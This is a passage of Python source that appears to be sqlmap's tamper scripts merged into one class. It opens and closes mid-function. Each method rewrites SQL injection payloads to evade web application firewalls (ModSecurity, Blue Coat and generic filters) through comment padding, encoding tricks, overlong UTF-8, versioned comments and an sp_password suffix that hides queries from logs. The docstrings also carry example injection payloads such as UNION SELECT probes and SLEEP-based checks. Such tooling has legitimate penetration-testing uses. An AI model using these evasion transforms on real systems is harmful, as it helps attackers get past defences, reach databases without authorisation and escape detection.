randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
else:
return match.group()
retVal = ""
if payload:
payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, payload)
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "%%23%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2morecomment(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with comments '/**_**/'
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/**_**/"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/**_**/"
continue
retVal += payload[i]
return retVal
def space2hash(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL
Tested against:
* MySQL 4.0, 5.0
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "%%23%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2dash(self, payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "--%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2comment(self, payload, **kwargs):
"""
Replaces space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/**/"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/**/"
continue
retVal += payload[i]
return retVal
def sp_password(self, payload, **kwargs):
"""
Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""
retVal = ""
if payload:
retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
return retVal
def randomcomments(self, payload, **kwargs):
"""
Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in self.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
_ += word[-1]
if "/**/" not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + "/**/" + word[index:]
retVal = retVal.replace(word, _)
return retVal
def randomcase(self, payload, **kwargs):
"""
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* SQLite 3
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt Id FrOm `user`'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal):
word = match.group()
if (word.upper() in self.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload:
while True:
_ = ""
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
return retVal
def plus2fnconcat(self, payload, **kwargs):
"""
Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
Tested against:
* Microsoft SQL Server 2008
Requirements:
* Microsoft SQL Server 2008+
Notes:
* Useful in case ('+') character is filtered
* https://msdn.microsoft.com/en-us/library/bb630290.aspx
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
"""
retVal = payload
if payload:
match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
if match:
old = match.group(0)
parts = []
last = 0
for index in zeroDepthSearch(old, '+'):
parts.append(old[last:index].strip('+'))
last = index
parts.append(old[last:].strip('+'))
replacement = parts[0]
for i in xrange(1, len(parts)):
replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i])
retVal = retVal.replace(old, replacement)
return retVal
def plus2concat(self, payload, **kwargs):
"""
Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
Tested against:
* Microsoft SQL Server 2012
Requirements:
* Microsoft SQL Server 2012+
Notes:
* Useful in case ('+') character is filtered
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
"""
retVal = payload
if payload:
match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
if match:
part = match.group(0)
chars = [char for char in part]
for index in zeroDepthSearch(part, '+'):
chars[index] = ','
replacement = "CONCAT(%s)" % "".join(chars)
retVal = retVal.replace(part, replacement)
return retVal
def percentage(self, payload, **kwargs):
"""
Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
"""
retVal = ""
if payload:
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
elif payload[i] != ' ':
retVal += '%%%s' % payload[i]
i += 1
else:
retVal += payload[i]
i += 1
return retVal
def overlongutf8more(self, payload, **kwargs):
"""
Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
Reference:
* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
i += 1
return retVal
def overlongutf8(self, payload, **kwargs):
"""
Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
Reference:
* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
if payload[i] not in (string.ascii_letters + string.digits):
retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
else:
retVal += payload[i]
i += 1
return retVal
def multiplespaces(self, payload, **kwargs):
"""
Adds multiple spaces (' ') around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
"""
retVal = payload
if payload:
words = OrderedSet()
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if word.upper() in self.keywords:
words.add(word)
for word in words:
retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)
retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal)
return retVal
def modsecurityzeroversioned(self, payload, **kwargs):
"""
Embraces complete query with (MySQL) zero-versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
"""
retVal = payload
if payload:
postfix = ''
for comment in ('#', '--', '/*'):
if comment in payload:
postfix = payload[payload.find(comment):]
payload = payload[:payload.find(comment)]
break
if ' ' in payload:
retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
return retVal
def modsecurityversioned(self, payload, **kwargs):
"""
Embraces complete query with (MySQL) versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'
"""
retVal = payload
if payload:
postfix = ''
for comment in ('#', '--', '/*'):
if comment in payload:
postfix = payload[payload.find(comment):]
payload = payload[:payload.find(comment)]
break
if ' ' in payload:
retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], self.randomInt(3), payload[payload.find(' ') + 1:], postfix)
return retVal
def lowercase(self, payload, **kwargs):
"""
Replaces each keyword character with lower case value (e.g. SELECT -> select)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
>>> tamper('INSERT')
'insert'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
word = match.group()
if word.upper() in self.keywords:
retVal = retVal.replace(word, word.lower())
return retVal
def least(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'LEAST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The LEAST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
retVal = retVal.replace(match.group(0), _)
return retVal
def informationschemacomment(self, payload, **kwargs):
"""
Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
return retVal
def ifnull2ifisnull(self, payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() function
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
"""
if payload and payload.find("IFNULL") > -1:
while payload.find("IFNULL(") > -1:
index = payload.find("IFNULL(")
depth = 1
comma, end = None, None
for i in xrange(index + len("IFNULL("), len(payload)):
if depth == 1 and payload[i] == ',':
comma = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end].lstrip()
newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
def ifnull2casewhenisnull(self, payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() functions
>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'
"""
if payload and payload.find("IFNULL") > -1:
while payload.find("IFNULL(") > -1:
index = payload.find("IFNULL(")
depth = 1
comma, end = None, None
for i in xrange(index + len("IFNULL("), len(payload)):
if depth == 1 and payload[i] == ',':
comma = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end].lstrip()
newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
def htmlencode(self, payload, **kwargs):
"""
HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
"""
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload
def hex2char(self, payload, **kwargs):
"""
Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
Requirement:
* MySQL
Tested against:
* MySQL 4, 5.0 and 5.5
Notes:
* Useful in cases when web application does the upper casing
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal):
if len(match.group(1)) > 2:
result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1))))
else:
result = "CHAR(%d)" % ord(decodeHex(match.group(1)))
retVal = retVal.replace(match.group(0), result)
return retVal
def halfversionedmorekeywords(self, payload, **kwargs):
"""
Adds (MySQL) versioned comment before each keyword
Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "/*!0%s" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
retVal = retVal.replace(" /*!0", "/*!0")
return retVal
def greatest(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
_ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
retVal = retVal.replace(match.group(0), _)
return retVal
def escapequotes(self, payload, **kwargs):
"""
Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
"""
return payload.replace("'", "\\'").replace('"', '\\"')
def equaltolike(self, payload, **kwargs):
"""
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
"""
retVal = payload
if payload:
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal
def concat2concatws(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the CONCAT() function
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
"""
if payload:
payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")
return payload
def commentbeforeparentheses(self, payload, **kwargs):
"""
Prepends (inline) comment before parentheses (e.g. ( -> /**/()
Tested against:
* Microsoft SQL Server
* MySQL
* Oracle
* PostgreSQL
Notes:
* Useful to bypass web application firewalls that block usage
of function calls
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
"""
retVal = payload
if payload:
retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal)
return retVal
def commalessmid(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
you should consider usage of switch '--no-cast' along with tamper script 'commalessmid'
Requirement:
* MySQL
Tested against:
* MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
"""
retVal = payload
match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "")
if match:
retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3)))
return retVal
def commalesslimit(self, payload, **kwargs):
"""
Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
Requirement:
* MySQL
Tested against:
* MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
"""
retVal = payload
match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
if match:
retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
return retVal
def charunicodeescape(self, payload, **kwargs):
"""
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
Notes:
* Useful to bypass weak filtering and/or WAFs in JSON contexes
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += '\\u%.4X' % ord(payload[i])
i += 1
return retVal
def charunicodeencode(self, payload, **kwargs):
"""
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "%%u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%u%.4X' % ord(payload[i])
i += 1
return retVal
def charencode(self, payload, **kwargs):
"""
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
retVal += '%%%.2X' % ord(payload[i])
i += 1
return retVal
def bluecoat(self, payload, **kwargs):
"""
Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
Requirement:
* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
* MySQL 5.1, SGOS
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords:
return match.group().replace(word, "%s%%09" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
retVal = retVal.replace("%09 ", "%09")
return retVal
def between(self, payload, **kwargs):
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
if match:
_ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
retVal = retVal.replace(match.group(0), _)
else:
retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)
if retVal == payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
if match:
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _)
return retVal
def appendnullbyte(self, payload, **kwargs):
"""
Appends (Access) NULL byte character (%00) at the end of payload
Requirement:
* Microsoft Access
Notes:
* Useful to bypass weak web application firewalls when the back-end
database management system is Microsoft Access - further uses are
also possible
Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
"""
return "%s%%00" % payload if payload else payload
def apostrophenullencode(self, payload, **kwargs):
"""
Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload
def apostrophemask(self, payload, **kwargs):
"""
Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
* http://lukasz.pilorz.net/testy/unicode_conversion/
